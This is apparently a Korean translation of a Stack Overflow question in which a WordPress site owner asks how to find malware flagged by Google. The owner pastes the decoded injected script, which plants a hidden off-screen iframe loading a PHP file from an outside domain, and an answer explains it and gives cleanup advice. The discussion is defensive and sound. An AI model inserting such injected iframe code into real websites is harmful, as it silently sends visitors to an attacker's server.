웹 사이트에서 악성 코드/멀웨어를 찾는 방법
내 워드프레스 웹사이트가 최근 악성코드에 감염되어 블랙리스트에 올랐다.사이트와 플러그인을 업데이트하고 모르는 코드를 삭제하여 수정했다고 생각했습니다.
그 후 Sucuri Site Checker를 사용했는데 괜찮은 것 같아서 구글에 리뷰 요청을 했습니다.그러나 구글은 악성코드 형태의 악성코드가 여전히 포함되어 있다고 밝혔다(코드 주입이라고 한다).
나는 어떻게 해야 할지 좀 망설여진다.구글이 찾고 있는 코드를 찾을 수 있는 방법이 있나요?도메인은 sudorf.co.uk이지만 멀웨어가 있기 때문에 거기에 가는 것은 권장하지 않습니다.멀웨어가 무엇을 하고 있는지 알 수 없습니다.
어떤 도움이라도 주시면 감사하겠습니다.
편집: 며칠 전에 코드를 찾아서 삭제하고 모든 버전을 업데이트했습니다.하지만 분명히 그것은 다시 돌아왔다.거기까지 어떻게 가고 있는지 아는 사람 있나요?제 생각에는 어느 쪽이든 플러그인에서 나온 것 같습니다.그래서 그것들을 모두 삭제하려고 합니다.다른 하나는 연락처 폼입니다만, 이 폼으로 header.php를 편집할 수 없다고 생각했습니다.
이것은 순수한 정보입니다.해독 해제 시 악성코드는 다음과 같습니다.
function k09() {
var static = 'ajax';
var controller = 'index.php';
var k = document.createElement('iframe');
k.src = 'http://dostojewskij-gesellschaft.de/VD49Jdzr.php';
k.style.position = 'absolute';
k.style.color = '512';
k.style.height = '512px';
k.style.width = '512px';
k.style.left = '1000512';
k.style.top = '1000512';
if (!document.getElementById('k')) {
document.write('<p id=\'k\' class=\'k09\' ></p>');
document.getElementById('k').appendChild(k);
}
}
function SetCookie(cookieName, cookieValue, nDays, path) {
var today = new Date();
var expire = new Date();
if (nDays == null || nDays == 0) nDays = 1;
expire.setTime(today.getTime() + 3600000 * 24 * nDays);
document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name) {
var start = document.cookie.indexOf(name + "=");
var len = start + name.length + 1;
if ((!start) &&
(name != document.cookie.substring(0, name.length))) {
return null;
}
if (start == -1) return null;
var end = document.cookie.indexOf(";", len);
if (end == -1) end = document.cookie.length;
return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled) {
if (GetCookie('visited_uq') == 55) {} else {
SetCookie('visited_uq', '55', '1', '/');
k09();
}
}
http://dostojewskij-gesellschaft.de/VD49Jdzr.php는, 「OK」를 출력합니다.
왜요?
IP/트래픽 로거인 것 같습니다.해커들이 어떤 블로그가 가장 활동적인지 확인하고 나중에 돌아와서 특정 사이트를 해킹할 수도 있습니다(한 달에 방문자 2명이 있는 사이트에서 시간을 낭비할 필요는 없습니다).이게 좋고 나쁨이에요.
좋은 점은 그들이 당신의 사용자 데이터베이스나 다른 어떤 것도 사용하지 않은 것처럼 보인다는 것입니다.
단점은 그들이 명백히 당신의 서버에 대한 실행 권한을 가지고 있기 때문에 당신의 데이터베이스 전체를 다운로드 했을 가능성이 높고, PHP 파일을 당신의 서버 전체에 배치했을 가능성이 있다는 것입니다.새로운 WP에서 시작하여 플러그인/테마를 하나씩 복사하면서 수동으로 확인하는 것이 가장 좋습니다.
모든 비밀번호를 변경합니다.DB 로그인도 가능합니다.모든 것이 손상된 것으로 간주합니다.
언급URL : https://stackoverflow.com/questions/18638604/how-to-find-malicous-code-malware-on-a-website
'programing' 카테고리의 다른 글
| 데이터 바인딩 없이 값 렌더링 (0) | 2023.02.18 |
|---|---|
| JSON 또는 SOAP(XML)? (0) | 2023.02.16 |
| React에서 후크를 사용하여 컴포넌트를 강제로 다시 렌더링하려면 어떻게 해야 합니까? (0) | 2023.02.16 |
| React Native 앱이 닫혔을 때(일시 중단되지 않았을 때) 어떻게 감지합니까? (0) | 2023.02.16 |
| VS 코드에서 "Comments is not allowed in JSON" 오류를 비활성화합니다. (0) | 2023.02.16 |